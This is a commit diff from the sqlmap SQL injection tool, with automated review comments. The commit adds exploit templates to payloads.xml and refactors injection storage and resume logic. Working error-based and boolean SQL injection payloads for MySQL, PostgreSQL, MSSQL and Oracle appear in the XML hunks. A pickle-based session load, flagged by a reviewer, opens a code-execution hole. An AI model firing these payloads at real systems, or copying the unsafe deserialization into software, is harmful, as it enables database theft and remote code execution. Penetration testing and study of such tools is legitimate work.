Added tag <epayload> to the payloads.xml's <test> tag to define which payload to use when exploiting the test type.

Removed some useless tests.
Moved <error> from queries.xml to payloads.xml as it makes more sense.
Beeps when a SQL injection is found only if --beep is provided.
Minor fix in order to be able to pickle advancedDict() objects.
Minor code refactoring.
Removed useless folders.
This commit is contained in:
Bernardo Damele 2010-12-01 17:09:52 +00:00
parent c00ea7f5e5
commit 089c16a1b8
11 changed files with 187 additions and 288 deletions


@ -33,6 +33,7 @@ from lib.core.datatype import injectionDict
from lib.core.enums import HTTPMETHOD from lib.core.enums import HTTPMETHOD
from lib.core.enums import NULLCONNECTION from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import sqlmapConnectionException from lib.core.exception import sqlmapConnectionException
from lib.core.exception import sqlmapGenericException from lib.core.exception import sqlmapGenericException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import sqlmapNoneDataException
@ -331,14 +332,28 @@ def checkSqlInjection(place, parameter, value):
# Feed with the boundaries details only the first time a # Feed with the boundaries details only the first time a
# test has been successful # test has been successful
if injection.place is None or injection.parameter is None: if injection.place is None or injection.parameter is None:
if place == PLACE.UA:
injection.parameter = conf.agent
else:
injection.parameter = parameter
injection.place = place injection.place = place
injection.parameter = parameter
injection.ptype = ptype injection.ptype = ptype
injection.prefix = prefix injection.prefix = prefix
injection.suffix = suffix injection.suffix = suffix
if "epayload" in test:
epayload = "%s%s" % (test.epayload, comment)
else:
epayload = None
# Feed with test details every time a test is successful # Feed with test details every time a test is successful
injection.data[stype] = (title, agent.removePayloadDelimiters(reqPayload, False), where, comment) injection.data[stype] = advancedDict()
injection.data[stype].title = title
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
injection.data[stype].where = where
injection.data[stype].epayload = epayload
injection.data[stype].comment = comment
if "details" in test: if "details" in test:
for detailKey, detailValue in test.details.items(): for detailKey, detailValue in test.details.items():
@ -351,7 +366,8 @@ def checkSqlInjection(place, parameter, value):
elif detailKey == "os" and injection.os is None: elif detailKey == "os" and injection.os is None:
injection.os = detailValue injection.os = detailValue
beep() if conf.beep:
beep()
# There is no need to perform this test for other # There is no need to perform this test for other
# <where> tags # <where> tags
@ -703,7 +719,6 @@ def checkConnection(suppressOutput=False):
try: try:
page, _ = Request.queryPage(content=True) page, _ = Request.queryPage(content=True)
conf.seqMatcher.set_seq1(page) conf.seqMatcher.set_seq1(page)
except sqlmapConnectionException, errMsg: except sqlmapConnectionException, errMsg:
errMsg = getUnicode(errMsg) errMsg = getUnicode(errMsg)
raise sqlmapConnectionException, errMsg raise sqlmapConnectionException, errMsg
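Review bot: `epayload = "%s%s" % (test.epayload, comment)` in checkSqlInjection bakes the comment into the stored template, so if `comment` is None at this point the template ends in a literal `None`; the new advancedDict still records `comment` as its own field, so the concatenation could be left to the consumer, or at least guarded with `epayload = "%s%s" % (test.epayload, comment or "")`. The `place == PLACE.UA` branch re-homes the substitution this commit removes from setInjection; a one-line comment such as `# User-Agent injections carry no named parameter, so record the agent string itself` would make that move traceable. checkSqlInjection starts and ends outside this hunk.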


@ -107,10 +107,9 @@ def __formatInjection(inj):
data += "Parameter: %s\n" % inj.parameter data += "Parameter: %s\n" % inj.parameter
for stype, sdata in inj.data.items(): for stype, sdata in inj.data.items():
stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype
data += " Type: %s\n" % stype data += " Type: %s\n" % stype
data += " Title: %s\n" % sdata[0] data += " Title: %s\n" % sdata.title
data += " Payload: %s\n\n" % sdata[1] data += " Payload: %s\n\n" % sdata.payload
return data return data
@ -136,7 +135,7 @@ def __saveToSessionFile():
parameter = inj.parameter parameter = inj.parameter
for stype, sdata in inj.data.items(): for stype, sdata in inj.data.items():
payload = sdata[1] payload = sdata.payload
if stype == 1: if stype == 1:
kb.booleanTest = payload kb.booleanTest = payload
@ -303,7 +302,8 @@ def start():
# TODO: consider the following line in __setRequestParams() # TODO: consider the following line in __setRequestParams()
__testableParameters = True __testableParameters = True
if not kb.injection.place or not kb.injection.parameter: if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
and (kb.injection.place is None or kb.injection.parameter is None):
if not conf.string and not conf.regexp and not conf.eRegexp: if not conf.string and not conf.regexp and not conf.eRegexp:
# NOTE: this is not needed anymore, leaving only to display # NOTE: this is not needed anymore, leaving only to display
# a warning message to the user in case the page is not stable # a warning message to the user in case the page is not stable
@ -394,7 +394,7 @@ def start():
__showInjections() __showInjections()
__selectInjection() __selectInjection()
if kb.injection.place and kb.injection.parameter: if kb.injection.place is not None and kb.injection.parameter is not None:
if conf.multipleTargets: if conf.multipleTargets:
message = "do you want to exploit this SQL injection? [Y/n] " message = "do you want to exploit this SQL injection? [Y/n] "
exploit = readInput(message, default="Y") exploit = readInput(message, default="Y")
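Review bot: `__formatInjection` drops the `PAYLOAD.SQLINJECTION[stype]` mapping, so the `Type:` line now prints whatever key `inj.data` is indexed by; elsewhere in this commit the keys look numeric (`kb.injection.data[2]` in errorUse, `stype == 1` in `__saveToSessionFile`), which would make the report read `Type: 2` unless the mapping moved somewhere outside this hunk. If it did not, keep `stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype` before the format. The new condition in start() (the `len(kb.injections)` test joined with the `kb.injection.place`/`parameter` test across two lines) is hard to read inline; binding it to a named flag such as `noInjectionResumed` and testing that keeps the intent visible. Both functions extend beyond the hunks shown.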


@ -158,6 +158,9 @@ class Agent:
return string return string
def cleanupPayload(self, payload): def cleanupPayload(self, payload):
if payload is None:
return
randInt = randomInt() randInt = randomInt()
randInt1 = randomInt() randInt1 = randomInt()
randStr = randomStr() randStr = randomStr()
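Review bot: The new guard in cleanupPayload returns None implicitly for a None payload, and the only new caller visible in this commit (errorUse) passes that result straight to `agent.prefixQuery`; nothing in the method says the None path is intended. Write the return explicitly and document it: `if payload is None:` / `return None`, with a docstring line such as `Returns None when *payload* is None (a test whose <epayload> was empty or absent).` cleanupPayload continues beyond the hunk.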


@ -37,7 +37,7 @@ class advancedDict(dict):
try: try:
return self.__getitem__(item) return self.__getitem__(item)
except KeyError: except KeyError:
raise sqlmapDataException, "Unable to access item '%s'" % item raise sqlmapDataException, "unable to access item '%s'" % item
def __setattr__(self, item, value): def __setattr__(self, item, value):
""" """
@ -56,6 +56,12 @@ class advancedDict(dict):
else: else:
self.__setitem__(item, value) self.__setitem__(item, value)
def __getstate__(self):
return self.__dict__
def __setstate__(self, dict):
self.__dict__ = dict
def injectionDict(): def injectionDict():
injection = advancedDict() injection = advancedDict()
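Review bot: `__setstate__(self, dict)` names its parameter after the builtin that advancedDict subclasses, which is confusing inside a dict subclass; rename it: `def __setstate__(self, state):` / `self.__dict__ = state`. Because the class overrides `__setattr__` to route attributes into items, assigning `self.__dict__` directly here bypasses that hook on purpose; a comment `# bypass __setattr__: restore instance attributes verbatim` records the intent. Pickle handles a dict subclass's items separately from its `__dict__`, so the round trip should keep both; confirm against the rest of the class, whose header is outside this hunk.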


@ -12,6 +12,8 @@ import re
from lib.core.common import dataToSessionFile from lib.core.common import dataToSessionFile
from lib.core.common import formatFingerprintString from lib.core.common import formatFingerprintString
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.convert import base64pickle
from lib.core.convert import base64unpickle
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
@ -78,30 +80,15 @@ def setInjection(inj):
session file. session file.
""" """
if inj.place == PLACE.UA:
inj.parameter = conf.agent
condition = ( condition = (
( not kb.resumedQueries ( not kb.resumedQueries
or ( kb.resumedQueries.has_key(conf.url) and or ( kb.resumedQueries.has_key(conf.url) and
( not kb.resumedQueries[conf.url].has_key("Injection point") not kb.resumedQueries[conf.url].has_key("Injection data")
or not kb.resumedQueries[conf.url].has_key("Injection parameter") ) )
) ) )
) )
if condition: if condition:
dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.place)) dataToSessionFile("[%s][%s][%s][Injection data][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), base64pickle(inj)))
dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.parameter))
dataToSessionFile("[%s][%s][%s][Injection parameter type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.PARAMETER[inj.ptype]))
dataToSessionFile("[%s][%s][%s][Injection prefix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.prefix))
dataToSessionFile("[%s][%s][%s][Injection suffix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.suffix))
for stype, sdata in inj.data.items():
dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.SQLINJECTION[stype]))
dataToSessionFile("[%s][%s][%s][Injection title][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[0]))
dataToSessionFile("[%s][%s][%s][Injection payload][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[1]))
dataToSessionFile("[%s][%s][%s][Injection where][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[2]))
dataToSessionFile("[%s][%s][%s][Injection comment][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[3]))
def setDbms(dbms): def setDbms(dbms):
""" """
@ -370,96 +357,11 @@ def resumeConfKb(expression, url, value):
except ValueError: except ValueError:
pass pass
elif expression == "Injection point" and url == conf.url: elif expression == "Injection data" and url == conf.url:
injPlace = value[:-1] injection = base64unpickle(value[:-1])
kb.injections.append(injection)
logMsg = "resuming injection point '%s' from session file" % injPlace logMsg = "resuming injection data"
logger.info(logMsg)
if not conf.paramDict.has_key(injPlace):
warnMsg = "none of the parameters you provided "
warnMsg += "matches the resumable injection point. "
warnMsg += "sqlmap is going to reidentify the "
warnMsg += "injectable point"
logger.warn(warnMsg)
else:
if kb.injection.place is not None and kb.injection.parameter is not None:
kb.injections.append(kb.injection)
kb.injection = injectionDict()
kb.injection.place = injPlace
elif expression == "Injection parameter" and url == conf.url:
injParameter = unSafeFormatString(value[:-1])
logMsg = "resuming injection parameter '%s' from session file" % injParameter
logger.info(logMsg)
condition = (
not conf.paramDict.has_key(kb.injection.place) or
not conf.paramDict[kb.injection.place].has_key(injParameter)
)
if condition:
warnMsg = "none of the parameters you provided "
warnMsg += "matches the resumable injection parameter. "
warnMsg += "sqlmap is going to reidentify the "
warnMsg += "injectable point"
logger.warn(warnMsg)
else:
kb.injection.parameter = injParameter
elif expression == "Injection parameter type" and url == conf.url:
kb.injection.ptype = unSafeFormatString(value[:-1])
logMsg = "resuming injection parameter type '%s' from session file" % kb.injection.ptype
logger.info(logMsg)
elif expression == "Injection prefix" and url == conf.url:
kb.injection.prefix = unSafeFormatString(value[:-1])
logMsg = "resuming injection prefix '%s' from session file" % kb.injection.prefix
logger.info(logMsg)
elif expression == "Injection suffix" and url == conf.url:
kb.injection.suffix = unSafeFormatString(value[:-1])
logMsg = "resuming injection suffix '%s' from session file" % kb.injection.suffix
logger.info(logMsg)
elif expression == "Injection type" and url == conf.url:
stype = unSafeFormatString(value[:-1])
kb.injection.data[stype] = []
logMsg = "resuming injection type '%s' from session file" % stype
logger.info(logMsg)
elif expression == "Injection title" and url == conf.url:
title = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(title)
logMsg = "resuming injection title '%s' from session file" % title
logger.info(logMsg)
elif expression == "Injection payload" and url == conf.url:
payload = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(payload)
logMsg = "resuming injection payload '%s' from session file" % payload
logger.info(logMsg)
elif expression == "Injection where" and url == conf.url:
where = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(where)
logMsg = "resuming injection where '%s' from session file" % where
logger.info(logMsg)
elif expression == "Injection comment" and url == conf.url:
comment = unSafeFormatString(value[:-1])
kb.injection.data[kb.injection.data.keys()[0]].append(comment)
logMsg = "resuming injection comment '%s' from session file" % comment
logger.info(logMsg) logger.info(logMsg)
elif expression == "Boolean-based blind injection" and url == conf.url: elif expression == "Boolean-based blind injection" and url == conf.url:
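Review bot: `injection = base64unpickle(value[:-1])` in resumeConfKb turns the session file into executable input: unpickling reconstructs arbitrary objects and calls their constructors, so anyone able to write that file can run code inside the sqlmap process when the session is resumed, whereas the removed field-by-field parsing only ever produced strings. At minimum record the trust assumption at the call site, `# the session file is trusted input: pickle executes callables on load`, and prefer either serializing the injection fields explicitly as the removed code did or a `pickle.Unpickler` subclass whose `find_class` admits only advancedDict. A truncated or corrupt line now surfaces as whatever base64unpickle raises instead of the warning path the old branches had, assuming base64unpickle does not catch it. The log message also lost the detail the old messages carried; `logMsg = "resuming injection data for place '%s', parameter '%s' from session file" % (injection.place, injection.parameter)` restores it. resumeConfKb and setInjection both extend outside the hunks.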


@ -14,6 +14,9 @@ from lib.core.data import paths
from lib.core.datatype import advancedDict from lib.core.datatype import advancedDict
def cleanupVals(values, tag): def cleanupVals(values, tag):
if isinstance(values, basestring):
return values
count = 0 count = 0
for value in values: for value in values:
@ -48,7 +51,7 @@ def parseXmlNode(node):
for child in element.getchildren(): for child in element.getchildren():
if child.text and child.text.strip(): if child.text and child.text.strip():
values = cleanupVals(child.text.split(','), child.tag) values = cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)
test[child.tag] = values test[child.tag] = values
else: else:
if len(child.getchildren()) == 0: if len(child.getchildren()) == 0:
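Review bot: parseXmlNode special-cases `epayload` inline (`child.text.split(',') if child.tag != "epayload" else child.text`) while cleanupVals separately learns to pass strings through, so the knowledge that some tags hold a verbatim template is split across two functions with no comment in either. A comment at the call site, `# <epayload> is a raw SQL template containing commas and a %s placeholder, so it is stored verbatim rather than split`, ties the two together; if more verbatim tags follow, a module-level tuple such as `VERBATIM_TAGS = ("epayload",)` tested with `child.tag in VERBATIM_TAGS` keeps the rule in one place. The branch is entered only when `child.text.strip()` is non-empty, yet the verbatim value is stored unstripped, so surrounding whitespace or newlines in the XML end up inside the template; `child.text.strip()` avoids that. Both functions continue outside the hunks.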


@ -401,8 +401,8 @@ def goStacked(expression, silent=False):
return direct(expression), None return direct(expression), None
comment = queries[kb.dbms].comment.query comment = queries[kb.dbms].comment.query
query = agent.prefixQuery("; %s" % expression) query = agent.prefixQuery("; %s" % expression)
query = agent.suffixQuery("%s;%s" % (query, comment)) query = agent.suffixQuery("%s;%s" % (query, comment))
debugMsg = "query: %s" % query debugMsg = "query: %s" % query
logger.debug(debugMsg) logger.debug(debugMsg)
@ -412,7 +412,7 @@ def goStacked(expression, silent=False):
return payload, page return payload, page
def goError(expression, suppressOutput=False, returnPayload=False): def goError(expression, suppressOutput=False):
""" """
Retrieve the output of a SQL query taking advantage of an error-based Retrieve the output of a SQL query taking advantage of an error-based
SQL injection vulnerability on the affected parameter. SQL injection vulnerability on the affected parameter.
@ -436,10 +436,8 @@ def goError(expression, suppressOutput=False, returnPayload=False):
result = resume(expression, None) result = resume(expression, None)
if not result: if not result:
result = errorUse(expression, returnPayload) result = errorUse(expression)
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
if not returnPayload:
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
if suppressOutput: if suppressOutput:
conf.verbose = popValue() conf.verbose = popValue()
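Review bot: goError now writes `conf.parameters[kb.injection.place]` raw into the session line, while setInjection in this same commit writes the same value through `safeFormatString(...)`; the two writers should agree, otherwise a parameter string containing the `[`/`]` delimiters is stored differently depending on which path produced the line. Use `safeFormatString(conf.parameters[kb.injection.place])` in the format tuple here as well (importing it if it is not already in scope). The line also runs when errorUse returns None (its `output` stays None without a match), so `replaceNewlineTabs(result)` receives None unless it tolerates that; wrapping the write in `if result is not None:` avoids recording an empty result as resumable. goError's body continues past the hunk.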


@ -28,45 +28,37 @@ from lib.utils.resume import resume
from lib.core.settings import ERROR_SPACE from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR from lib.core.settings import ERROR_EMPTY_CHAR
def errorUse(expression, returnPayload=False): def errorUse(expression):
""" """
Retrieve the output of a SQL query taking advantage of an error SQL Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter. injection vulnerability on the affected parameter.
""" """
output = None output = None
logic = conf.logic randInt = randomInt(1)
randInt = randomInt(1) query = agent.cleanupPayload(kb.injection.data[2].epayload)
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query) query = agent.prefixQuery(query)
query = agent.suffixQuery(query) query = agent.suffixQuery(query)
startLimiter = "" check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
endLimiter = ""
expressionUnescaped = expression expressionUnescaped = expression
if kb.dbmsDetected: _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
if kb.dbms == DBMS.MYSQL: if kb.dbms == DBMS.MYSQL:
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row' nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced) expression = safeStringFormat(query, expression)
startLimiter = unescaper.unescape("'%s'" % kb.misc.start) expression = unescaper.unescape(expression)
endLimiter = unescaper.unescape("'%s'" % kb.misc.stop)
else:
expressionUnescaped = kb.misc.handler.unescape(expression)
startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start)
endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter)) debugMsg = "query: %s" % expression
debugMsg = "query: %s" % forgedQuery
logger.debug(debugMsg) logger.debug(debugMsg)
payload = agent.payload(newValue=forgedQuery) payload = agent.payload(newValue=expression)
result = Request.queryPage(payload, content=True) reqBody, _ = Request.queryPage(payload, content=True)
match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE) match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
if match: if match:
output = match.group('result') output = match.group('result')
@ -78,7 +70,4 @@ def errorUse(expression, returnPayload=False):
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True) infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
logger.info(infoMsg) logger.info(infoMsg)
if returnPayload: return output
return output, payload
else:
return output
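Review bot: errorUse reads the error-based template as `kb.injection.data[2].epayload` with a bare literal, and when that test carried no `<epayload>` the field is None, so `agent.cleanupPayload` returns None and `agent.prefixQuery(None)` is the first thing to fail rather than a message naming the missing template; check it up front, `if query is None: raise sqlmapNoneDataException, "no error-based payload template for the resumed injection"` (or whichever project exception this module already imports), and replace the literal `2` with a named constant for the stype. In the new body `randInt = randomInt(1)` and `expressionUnescaped = expression` are no longer referenced by any visible line (the removed `forgedQuery` consumed them), so they look like dead locals; confirm against the rest of the function, which continues after the hunk, and drop them. The docstring should also say that the `%s` in the template is filled by `safeStringFormat` with the cast expression.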


@ -1,10 +0,0 @@
#!/usr/bin/env python
"""
$Id$
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
pass


@ -126,6 +126,9 @@ Tag: <test>
original value to its negative representation original value to its negative representation
3: Replace the parameter original value 3: Replace the parameter original value
Sub-tag: <epayload>
The payload that will be used to exploit the injection point.
Sub-tag: <request> Sub-tag: <request>
What to inject for this test. What to inject for this test.
@ -187,6 +190,7 @@ Formats:
<risk></risk> <risk></risk>
<clause></clause> <clause></clause>
<where></where> <where></where>
<epayload></epayload>
<request> <request>
<payload></payload> <payload></payload>
<comment></comment> <comment></comment>
@ -403,6 +407,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>AND [RANDNUM]=[RANDNUM]</payload> <payload>AND [RANDNUM]=[RANDNUM]</payload>
</request> </request>
@ -418,6 +423,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR [RANDNUM]=[RANDNUM]</payload>
</request> </request>
@ -436,6 +442,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -455,6 +462,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -473,6 +481,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -491,6 +500,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
@ -511,6 +521,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
</request> </request>
@ -526,6 +537,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -545,6 +557,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -563,6 +576,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -581,6 +595,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
@ -601,6 +616,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
</request> </request>
@ -619,6 +635,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
@ -638,6 +655,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
<request> <request>
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload> <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request> </request>
@ -656,6 +674,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
<request> <request>
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload> <payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request> </request>
@ -674,6 +693,7 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
@ -699,6 +719,7 @@ Formats:
